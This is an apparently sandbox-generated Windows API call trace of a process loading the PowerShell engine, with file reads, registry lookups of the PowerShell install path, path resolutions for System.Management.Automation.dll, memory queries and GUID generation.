	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.005] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.006] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.006] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.006] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.006] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.006] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0xf37, lpOverlapped=0x0) returned 1
	[0533.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f54c17, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f54c17*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.008] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f55578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2f55578*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0533.008] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0533.008] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0533.009] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0533.009] CoTaskMemFree (pv=0x376d70) 
	[0533.009] RegCloseKey (hKey=0x2e8) returned 0x0
	[0533.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0533.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0533.014] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x785e8de4, Data2=0xca8b, Data3=0x4fe8, Data4=([0]=0xbe, [1]=0x7c, [2]=0x31, [3]=0x66, [4]=0x12, [5]=0x18, [6]=0xb1, [7]=0x7c))) returned 0x0
	[0533.014] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xe1ad3a11, Data2=0x40c9, Data3=0x4a89, Data4=([0]=0x8a, [1]=0xba, [2]=0xcc, [3]=0xfb, [4]=0xf9, [5]=0xb6, [6]=0x20, [7]=0x76))) returned 0x0
	[0533.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.031] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4659621a, Data2=0x71a9, Data3=0x4c25, Data4=([0]=0xa4, [1]=0xab, [2]=0x5e, [3]=0xdc, [4]=0x30, [5]=0xad, [6]=0xf1, [7]=0x61))) returned 0x0
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.035] VirtualQuery (in: lpAddress=0x12b2a0, lpBuffer=0x12c160, dwLength=0x30 | out: lpBuffer=0x12c160*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0533.036] VirtualQuery (in: lpAddress=0x12b330, lpBuffer=0x12c1f0, dwLength=0x30 | out: lpBuffer=0x12c1f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0533.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.038] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0533.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0533.805] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0533.806] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7132055f, Data2=0x85fc, Data3=0x41d4, Data4=([0]=0xa7, [1]=0x48, [2]=0xec, [3]=0xad, [4]=0xbf, [5]=0x36, [6]=0x8b, [7]=0xab))) returned 0x0
	[0533.808] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xdb3d971f, Data2=0x972f, Data3=0x4f6f, Data4=([0]=0xa1, [1]=0x38, [2]=0x23, [3]=0x32, [4]=0x32, [5]=0xf6, [6]=0xb0, [7]=0xe5))) returned 0x0
	[0533.808] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xe976e456, Data2=0x43bc, Data3=0x463f, Data4=([0]=0x8a, [1]=0x3d, [2]=0x87, [3]=0xba, [4]=0x58, [5]=0x9d, [6]=0xea, [7]=0xe5))) returned 0x0
	[0533.818] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf34d5d83, Data2=0xfe67, Data3=0x4d9d, Data4=([0]=0xa2, [1]=0x65, [2]=0x50, [3]=0x65, [4]=0xaa, [5]=0x8b, [6]=0x75, [7]=0x55))) returned 0x0
	[0533.819] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x9fa40c12, Data2=0x3e9d, Data3=0x4646, Data4=([0]=0x9f, [1]=0xc, [2]=0xaa, [3]=0x8a, [4]=0xd9, [5]=0x28, [6]=0xd2, [7]=0x76))) returned 0x0
	[0533.819] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x445ac162, Data2=0xa856, Data3=0x4d8d, Data4=([0]=0xa3, [1]=0x58, [2]=0x62, [3]=0xf6, [4]=0x4f, [5]=0xba, [6]=0x80, [7]=0x98))) returned 0x0
	[0533.820] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5323b341, Data2=0x45a2, Data3=0x4f97, Data4=([0]=0x9d, [1]=0xdb, [2]=0xb0, [3]=0x83, [4]=0xf8, [5]=0xe4, [6]=0xf3, [7]=0x8b))) returned 0x0
	[0533.820] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xceb2a64f, Data2=0x7103, Data3=0x4984, Data4=([0]=0xb1, [1]=0xa1, [2]=0xa5, [3]=0x1a, [4]=0x9, [5]=0xcf, [6]=0x40, [7]=0x61))) returned 0x0
	[0533.820] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xda8bcb3b, Data2=0xdf73, Data3=0x4007, Data4=([0]=0xaf, [1]=0x83, [2]=0xd3, [3]=0x70, [4]=0x26, [5]=0x22, [6]=0x3a, [7]=0x1))) returned 0x0
	[0533.820] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4c28b025, Data2=0x8f03, Data3=0x4de4, Data4=([0]=0x9a, [1]=0xcf, [2]=0x90, [3]=0x25, [4]=0x1e, [5]=0x31, [6]=0xd0, [7]=0xb9))) returned 0x0
	[0533.820] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x91ace94e, Data2=0xb6e3, Data3=0x4239, Data4=([0]=0xa9, [1]=0x10, [2]=0xb2, [3]=0xa, [4]=0x21, [5]=0x63, [6]=0x6a, [7]=0xb4))) returned 0x0
	[0533.821] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5cb6b98a, Data2=0x6a44, Data3=0x4675, Data4=([0]=0xb3, [1]=0x6b, [2]=0x15, [3]=0x89, [4]=0x5f, [5]=0x13, [6]=0x6e, [7]=0xa4))) returned 0x0
	[0533.822] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x82536fef, Data2=0x5f19, Data3=0x4a1b, Data4=([0]=0x94, [1]=0x75, [2]=0xda, [3]=0xd5, [4]=0xfd, [5]=0x74, [6]=0x5e, [7]=0x55))) returned 0x0
	[0533.823] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4fd56fa1, Data2=0xd8c8, Data3=0x4ad9, Data4=([0]=0x9f, [1]=0xf6, [2]=0x97, [3]=0x7d, [4]=0x5f, [5]=0x12, [6]=0xde, [7]=0x61))) returned 0x0
	[0533.824] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xdcb5cbd9, Data2=0xf3e4, Data3=0x420b, Data4=([0]=0xbd, [1]=0x22, [2]=0x75, [3]=0x5d, [4]=0x8a, [5]=0xe, [6]=0xc, [7]=0x2f))) returned 0x0
	[0533.824] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xef5abb37, Data2=0xfda3, Data3=0x4b3b, Data4=([0]=0x95, [1]=0x6c, [2]=0xa8, [3]=0xbe, [4]=0x4c, [5]=0x12, [6]=0xd9, [7]=0x4d))) returned 0x0
	[0533.824] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xce3d6b62, Data2=0xb067, Data3=0x4d93, Data4=([0]=0x8f, [1]=0xd8, [2]=0x32, [3]=0xde, [4]=0x80, [5]=0xa0, [6]=0xa, [7]=0x88))) returned 0x0
	[0533.824] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x612f7938, Data2=0x6c83, Data3=0x42ed, Data4=([0]=0xb6, [1]=0x69, [2]=0x1e, [3]=0x17, [4]=0x17, [5]=0x48, [6]=0xec, [7]=0x8f))) returned 0x0
	[0533.824] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xe7ae75a9, Data2=0xec73, Data3=0x4566, Data4=([0]=0x8a, [1]=0xed, [2]=0x77, [3]=0x4f, [4]=0x4e, [5]=0xbe, [6]=0x95, [7]=0x66))) returned 0x0
	[0533.825] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2afaba77, Data2=0xcb0d, Data3=0x4c7a, Data4=([0]=0x97, [1]=0x39, [2]=0xa6, [3]=0x0, [4]=0x8c, [5]=0x62, [6]=0xad, [7]=0x7b))) returned 0x0
	[0533.825] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb3cfcb23, Data2=0x32c8, Data3=0x44ff, Data4=([0]=0x97, [1]=0xb2, [2]=0x51, [3]=0x83, [4]=0x14, [5]=0x29, [6]=0xdc, [7]=0x7f))) returned 0x0
	[0533.825] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x793ab5d5, Data2=0xacf3, Data3=0x4d61, Data4=([0]=0xbc, [1]=0x71, [2]=0xb9, [3]=0xa3, [4]=0xc2, [5]=0xc6, [6]=0xd1, [7]=0x41))) returned 0x0
